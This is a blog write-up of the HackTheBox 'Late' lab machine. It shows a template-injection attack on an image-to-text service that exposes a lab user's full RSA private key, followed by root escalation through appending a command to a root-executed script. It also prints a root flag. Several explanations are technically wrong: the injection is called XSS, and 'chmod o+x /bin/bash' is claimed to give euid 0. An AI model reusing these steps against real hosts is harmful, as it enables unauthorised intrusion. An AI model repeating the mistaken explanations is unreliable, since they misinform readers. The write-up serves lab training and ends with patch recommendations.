---
title: "Writeup - Late (HTB)"
date: 2022-04-25
slug: "writeup-late-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Late](https://app.hackthebox.com/machines/Late) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.129.45.153
```
Two TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (nginx 1.14.0)

![](img/image-2.webp)

## Exploit

First of all, let's start with the enumeration of the site's files.

![](img/image-3.webp)

![](img/image-4.webp)

After some research in the results nothing very interesting in this site. So I scan the subdomains.

![](img/image-5.webp)

I find the `images` subdomain. I add it in the `/etc/hosts` file, then I go to the site.

![](img/image-6.webp)

It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing?

After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server:

![](img/image-7.webp)

Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used:

- 777777 -> Jinja2
- 49 -> Twig


```bash
┌──(d3vyce㉿kali)-[~/Downloads]
└─$ cat results.txt 
<p>7777777
</p>
```
After retrieving the result file we find the answer `7777777`. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2) to see the possibilities.

I first try to send the following image:

![](img/image-8.webp)


```bash
┌──(d3vyce㉿kali)-[~/Downloads]
└─$ cat results.txt 
<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

</p>
```
In the result file I find the expected result, the web application is executed as `svc_acc`. I now try to see if this user has an RSA key that would allow me to connect via SSH:

![](img/image-9.webp)


```bash
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----
```
Now that I have the RSA key in my possession, I can connect in SSH and get the first flag :

![](img/image-10.webp)

## Privilege escalation

To start I run the [linpeas.sh](https://linpeas.sh) script to get an idea of what is present on the machine. Quickly I find a script `ssh-alert.sh` which is a script belonging to my user, but which is executed by root.

![](img/image-11.webp)

I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH.

![](img/image-12.webp)

Knowing that I can modify it, I add the following line at the end of the file.


```bash
echo "chmod o+x /bin/bash" >> ssh-alert.sh
```
This allows to add to the file a `euid = 0`, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command :

![](img/image-13.webp)

I am now root of the machine and I can recover the last flag.


```bash
bash-4.4# cat /root/root.txt 
0abb3c1b4d046ab54e80851cf85c6448
```
## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Update the image converter to avoid XSS
- Launch web applications with a user with minimum rights and no RSA key
- Do not let a user-modifiable script be executed by root